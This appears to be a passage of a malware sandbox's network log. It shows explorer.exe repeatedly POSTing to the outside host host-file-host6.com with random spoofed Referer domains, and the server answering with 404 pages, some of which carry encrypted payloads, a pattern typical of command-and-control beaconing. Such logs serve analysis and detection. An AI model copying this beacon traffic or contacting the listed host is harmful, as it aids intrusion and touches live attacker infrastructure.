                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 346
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.238881111 CET9351INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:32 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  33192.168.2.749801188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.340652943 CET9351OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://cqpptcaaq.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 326
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.455554962 CET9352INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:32 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 36 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 42 d4 f6 26 86 24 eb ad 94 50 2b e4 b6 40 22 e3 b3 b4 68 f4 99 bd 5c ae 75 96 cc 33 4b 5c 3f 08 4a df bb 34 e0 a8 54 d9 b1 c2 09 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 61I:82OB%,YR("XQB&$P+@"h\u3K\?J4T0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  34192.168.2.749805188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.205276012 CET12379OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://kunlarxj.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 243
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.314827919 CET12380INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:38 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  35192.168.2.749806188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.417076111 CET12381OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://fcarunhrnf.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 356
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.530178070 CET12382INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:38 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  36192.168.2.749807188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.746222973 CET12383OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://egvtcfnms.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 235
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.866769075 CET12384INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:38 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  37192.168.2.749808188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.968827963 CET12385OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://urcbtq.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 155
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.078393936 CET12385INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:39 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  38192.168.2.749810188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.260873079 CET12545OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://fwulqvf.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 135
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.373790979 CET12912INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:39 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  39192.168.2.749812188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.491084099 CET12965OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://mslexfru.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 142
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.594752073 CET13484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:39 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  4192.168.2.749761188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.814765930 CET1175OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://ndqivnd.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 350
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.910515070 CET1176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:08 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 46I:82OOj{CUg%EQAc}yc0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  40192.168.2.749813188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.681325912 CET13485OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://luhjtydl.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 143
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.780395031 CET13487INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:39 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  41192.168.2.749814188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.971889019 CET13500OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://jorckc.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 235
                                                                                                                                                                                                  Host: host-file-host6.com
